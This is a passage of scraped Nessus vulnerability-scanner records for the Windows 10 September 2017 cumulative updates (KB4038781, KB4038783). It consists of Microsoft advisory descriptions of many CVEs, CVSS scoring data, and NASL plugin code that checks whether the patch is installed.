An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. 
(CVE-2017-8759)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8677, CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. 
An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. 
If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8699) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-03T00:00:00", "type": "nessus", "title": "KB4038781: Windows 10 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", 
"CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8702", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8738", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038781.NASL", "href": "https://www.tenable.com/plugins/nessus/104385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104385);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8702\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8738\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n 
\"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11766\"\n );\n script_bugtraq_id(\n 98953,\n 100718,\n 100720,\n 100721,\n 100727,\n 100728,\n 100729,\n 100736,\n 100737,\n 100738,\n 100739,\n 100740,\n 100742,\n 100743,\n 100744,\n 100747,\n 100749,\n 100752,\n 100755,\n 100756,\n 100759,\n 100762,\n 100764,\n 100765,\n 100766,\n 100767,\n 100768,\n 100769,\n 100770,\n 100771,\n 100772,\n 100773,\n 100776,\n 100779,\n 100781,\n 100783,\n 100785,\n 100789,\n 100790,\n 100791,\n 100792,\n 100796,\n 100803,\n 100804\n );\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038781: Windows 10 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038781.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707,\n CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. 
The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8738,\n CVE-2017-8753, CVE-2017-8756)\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. 
The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. (CVE-2017-8759)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8677,\n CVE-2017-8681)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. 
The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2017-8702)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8699)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038781/windows-10-update-kb4038781\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c29dee1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038781.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038781');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nos_name = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif(\"LTSB\" >!< os_name) audit(AUDIT_OS_NOT, \"Windows 10 version 1507 LTSB\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038781])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2023-01-11T14:34:12", "description": "The remote Windows host is missing security update 4038783.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. 
The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8683)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. 
(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality.\n (CVE-2017-8702)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. 
An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8713)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. 
An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8738, CVE-2017-8752, CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. 
